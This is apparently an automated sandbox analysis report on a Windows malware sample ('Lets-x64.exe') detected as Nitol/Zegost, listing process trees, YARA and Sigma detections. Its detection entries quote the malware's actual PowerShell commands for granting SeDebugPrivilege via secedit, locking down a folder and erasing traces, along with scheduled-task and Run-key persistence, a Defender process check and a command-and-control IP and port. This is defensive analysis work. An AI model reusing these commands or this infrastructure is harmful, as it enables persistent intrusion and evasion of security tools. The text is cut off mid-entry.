      • SecEdit.exe (PID: 7684 cmdline: "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet MD5: BFC13856291E4B804D33BBAEFC8CB3B5)
    • cmd.exe (PID: 4612 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7736 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 8032 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7220 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 1164 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 5136 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 7200 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 984 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 2296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7748 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 4292 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 7908 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 828 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 8068 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 8144 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 3304 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 5956 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 6472 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • conhost.exe (PID: 5776 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 6532 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 5856 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 7700 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 7304 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 6388 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 5612 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 5660 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 1128 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3772 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 7600 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4024 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 3448 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 5716 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 6776 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 4140 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 4180 cmdline: schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 3664 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6036 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7752 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7964 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 8092 cmdline: cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
  • svchost.exe (PID: 7544 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
NitolNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.nitol

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Lets-x64.exeJoeSecurity_ZegostYara detected ZegostJoe Security
    Lets-x64.exeJoeSecurity_NitolYara detected NitolJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\ProgramData\Microsoft\Program\ziliao.jpgJoeSecurity_ZegostYara detected ZegostJoe Security
        C:\ProgramData\Microsoft\Program\ziliao.jpgJoeSecurity_NitolYara detected NitolJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_ZegostYara detected ZegostJoe Security
            0000001C.00000002.4577931834.0000000006640000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_NitolYara detected NitolJoe Security
              0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_ZegostYara detected ZegostJoe Security
                0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_NitolYara detected NitolJoe Security
                  0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_ZegostYara detected ZegostJoe Security
                    Click to see the 4 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    28.2.iusb3mon.exe.6240000.3.raw.unpackJoeSecurity_ZegostYara detected ZegostJoe Security
                      28.2.iusb3mon.exe.6240000.3.raw.unpackJoeSecurity_NitolYara detected NitolJoe Security
                        28.2.iusb3mon.exe.4d105bf.2.raw.unpackJoeSecurity_ZegostYara detected ZegostJoe Security
                          28.2.iusb3mon.exe.4d105bf.2.raw.unpackJoeSecurity_NitolYara detected NitolJoe Security
                            28.2.iusb3mon.exe.6640607.4.raw.unpackJoeSecurity_ZegostYara detected ZegostJoe Security
                              Click to see the 7 entries

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Base64 Encoded PowerShell Command Detected
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;", CommandLine: powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe" , ParentImage: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe, ParentProcessId: 6104, ParentProcessName: _P18sPbB.exe, ProcessCommandLine: powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;", ProcessId: 5996, ProcessName: powershell.exe
                              Sigma detected: Execution from Suspicious Folder
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe" , CommandLine: "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe, NewProcessName: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe, OriginalFileName: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start "title" "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2952, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe" , ProcessId: 6104, ProcessName: _P18sPbB.exe
                              Sigma detected: Parent in Public Folder Suspicious Process
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;", CommandLine: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe" , ParentImage: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe, ParentProcessId: 6104, ParentProcessName: _P18sPbB.exe, ProcessCommandLine: powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;", ProcessId: 1088, ProcessName: powershell.exe
                              Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;", CommandLine: powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe" , ParentImage: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe, ParentProcessId: 6104, ParentProcessName: _P18sPbB.exe, ProcessCommandLine: powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;", ProcessId: 5996, ProcessName: powershell.exe
                              Sigma detected: Suspicious Program Location with Network Connections
                              Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 202.79.169.178, DestinationIsIpv6: false, DestinationPort: 25445, EventID: 3, Image: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe, Initiated: true, ProcessId: 6104, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49741
                              Sigma detected: CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Program\iusb3mon.exe, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe, ProcessId: 6104, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft
                              Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\Program\iusb3mon.exe, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Documents\dtw_H3NyEy\_P18sPbB.exe, ProcessId: 6104, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft
                              Sigma detected: Non Interactive PowerShell Process Spawned
                              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));, CommandLine|base64offset|contains: ~>z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5664114 "__IRAFN:C:\Users\user\Desktop\Lets-x64.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-2246122658-3693405117-2476756634-1003", ParentImage: 